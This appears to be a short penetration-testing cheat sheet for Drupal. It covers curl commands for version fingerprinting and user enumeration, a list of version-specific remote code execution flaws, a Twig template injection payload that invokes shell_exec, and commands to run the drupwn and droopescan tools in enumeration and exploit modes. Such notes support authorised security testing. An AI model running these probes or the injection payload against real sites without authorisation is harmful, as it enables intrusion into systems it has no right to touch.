# check meta
curl https://www.drupal.org/ | grep 'content="Drupal'
# version
curl https://drupal-site.com/CHANGELOG.txt
# node
curl drupal-site.com/node/1
# users
# 403 -> exists | 404 -> doesn"t
curl https://www.drupal.org/user/X
# get username
curl https://www.drupal.org/reset/user/X/1/1
Drupal < 8.7.x Authenticated RCE module upload
Drupal < 9.1.x Authenticated RCE Twig templates
"{{ {"#lazy_builder": ["shell_exec", ["touch /tmp/hellofromviews"]]} }}"
If found /node/$NUMBER, the number could be devs or tests pages
Drupal < 8.6.9 - REST Module Remote Code Execution
Check for username disclosure on old versions:
?q=admin/views/ajax/autocomplete/user/a
Enumeration & Exploitation
# install
git clone https://github.com/immunIT/drupwn.git
cd drupwn
pip3 install -r requirements.txt
# enum
drupwn --mode enum --target $url
# exploit
drupwn --mode exploit --target $url
apt-get install python-pip
pip install droopescan
# scan
droopescan scan drupal -u example.org
